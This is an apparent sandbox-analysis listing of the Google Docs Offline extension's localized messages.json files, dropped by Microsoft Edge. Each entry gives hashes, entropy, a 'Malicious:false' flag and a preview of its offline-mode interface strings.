                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
